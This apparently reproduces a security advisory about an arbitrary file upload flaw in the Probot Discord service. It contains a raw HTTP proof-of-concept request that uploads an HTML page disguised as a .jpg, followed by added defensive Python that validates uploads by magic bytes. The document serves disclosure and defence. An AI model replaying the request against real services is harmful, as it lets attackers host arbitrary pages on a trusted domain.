Discord Probot Arbitrary File Upload
Discord Probot suffers from an arbitrary file upload vulnerability.
# PoC:
POST / HTTP/1.1
Host: uploader.probot.io
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length: 333
Origin: https://probot.io
DNT: 1
Connection: close
Referer: https://probot.io/server/""/welcomer

-----------------------------
Content-Disposition: form-data; name="file"; filename="ste.html.jpg"
Content-Type: text/html

<!DOCTYPE html>
<html>
<head>
<title>bypasss</title>
</head>
<body>
<div>bypass</div>
</body>
</html>
-------------------------------
Note: the link to the uploaded file is generated depending on the content type, in this case .html.
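As an added example (not part of the original advisory and not Probot's code), one way to handle such an upload on the server so that neither the filename nor the part's Content-Type decides the stored extension. The function names and the list of allowed image types are assumptions.

```python
import secrets

# Added example: names and the allowed-type list are assumptions.
# The type is decided from the file's leading bytes, not from client metadata.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": ("png", "image/png"),
    b"\xff\xd8\xff": ("jpg", "image/jpeg"),
    b"GIF87a": ("gif", "image/gif"),
    b"GIF89a": ("gif", "image/gif"),
}


def sniff_image(data: bytes):
    """Return (extension, mime) for an allowed image type, or None."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def accept_upload(filename: str, client_content_type: str, data: bytes) -> dict:
    """Pick the stored name and served type; filename and client_content_type
    are attacker-controlled and appear only in the rejection message."""
    kind = sniff_image(data)
    if kind is None:
        raise ValueError(
            f"rejected upload: claimed {client_content_type!r} / {filename!r}, "
            "content is not an allowed image"
        )
    ext, mime = kind
    return {
        "stored_name": f"{secrets.token_hex(16)}.{ext}",  # server-chosen name
        "content_type": mime,  # served type comes from the sniffed bytes
        "extra_headers": {"X-Content-Type-Options": "nosniff"},
    }


# Constructed sample inputs: the body part from the request above, and a PNG header.
POC_BODY = b"<!DOCTYPE html> <html> <head> <title>bypasss</title> </head> <body> <div>bypass</div> </body> </html>"
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    print(accept_upload("logo.png", "text/html", PNG_BODY))
    try:
        accept_upload("ste.html.jpg", "text/html", POC_BODY)
    except ValueError as err:
        print(err)
```

Magic-byte checks do not stop polyglot files, which is why the result also carries a server-chosen content type and the nosniff header for the response that serves the file.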